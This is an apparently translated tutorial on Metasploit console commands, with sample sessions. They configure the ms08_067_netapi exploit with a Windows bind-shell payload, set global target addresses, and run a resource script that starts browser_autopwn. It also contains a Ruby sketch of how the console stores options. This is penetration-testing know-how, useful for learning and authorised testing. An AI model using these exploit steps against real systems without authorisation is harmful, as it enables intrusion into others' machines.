connect command
The connect command connects to a remote host in the same way as nc or telnet, and a port can be specified. The following is a demonstration of the connect command:
msf > connect 127.0.0.1 4000
[*] Connected to 127.0.0.1:4000
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.

E:\技术工具\cmd>
msf >
set command
The set command sets the options and parameters of the module currently in use.
set payload xxx: set the payload to use
set encoder xxx/xxx: set the encoder used for the exploit
set target xxx: set the target type
set xxx xxx: set a parameter
Below, ms08-067 is used as an example:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
RHOST => 192.168.10.10
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options
check command
The check command tests whether the target appears vulnerable without running the exploit itself. In the session below the check cannot even reach the target:
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)
Setting global variables
Metasploit supports setting global variables and storing them, so they can be used directly the next time you log in. Use the setg command to set a global variable, unsetg to remove one, and save to store the global variables. For example:
msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136
msf > save
Saved configuration to: /root/.msf3/config
exploit/run command
Once the parameters are set, the exploit command launches the overflow. When a custom auxiliary module and its parameters are in use, the run command is needed to execute the operation instead.
msf auxiliary(ms09_001_write) > run
resource command
The resource command loads a resource file and executes the commands in that file in order.
msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
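As an added example (not Metasploit's own code and not from the original page), the Ruby sketch below models the console behaviour described in the set/setg/save section and in the resource section above: setg fills a global datastore, set fills the active module's datastore and shadows the global value, save serialises the globals for the next session, and resource replays a script line by line. The SAMPLE_RC text and the MiniConsole class are constructed for illustration and only mimic the real console's datastore rules.

```ruby
require 'json'
# Constructed sample resource file, one console command per line like karma.rc above.
SAMPLE_RC = <<~RC
  setg LHOST 192.168.1.101
  setg RHOSTS 192.168.1.0/24
  use windows/smb/ms08_067_netapi
  set payload windows/shell/bind_tcp
  set RHOSTS 192.168.1.136
RC

class MiniConsole
  attr_reader :globals, :module_opts, :active_module
  # Globals parsed from a #save string can be handed back in to model the next session.
  def initialize(globals = {})
    @globals = globals   # setg / unsetg / save act on this hash
    @module_opts = {}    # set acts on @module_opts[@active_module]
    @active_module = nil
  end

  # Effective option value: the module's own setting shadows the global one.
  def lookup(name)
    (@module_opts[@active_module] || {}).fetch(name) { @globals[name] }
  end

  # Execute one console line; blank lines and # comments are skipped.
  def execute(line)
    cmd, *args = line.strip.split(/\s+/)
    return self if cmd.nil? || cmd.start_with?('#')
    case cmd
    when 'use'    then @active_module = args[0]; @module_opts[args[0]] ||= {}
    when 'setg'   then @globals[args[0]] = args[1..-1].join(' ')
    when 'unsetg' then @globals.delete(args[0])
    when 'set'
      raise 'set needs an active module (use setg for globals)' unless @active_module
      @module_opts[@active_module][args[0]] = args[1..-1].join(' ')
    else raise "unknown command: #{cmd}"
    end
    self
  end

  # resource: replay every line of a script (String or IO) in order.
  def resource(script)
    script.each_line { |l| execute(l) }
    self
  end
  # save: serialise the globals; the real console writes them to its config file.
  def save
    JSON.generate('global' => @globals)
  end
end
```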
irb command
Running the irb command enters irb scripting mode, where you can execute Ruby commands and create scripts.
msf > irb
[*] Starting IRB shell...
>> puts "BlackAngle!"
BlackAngle!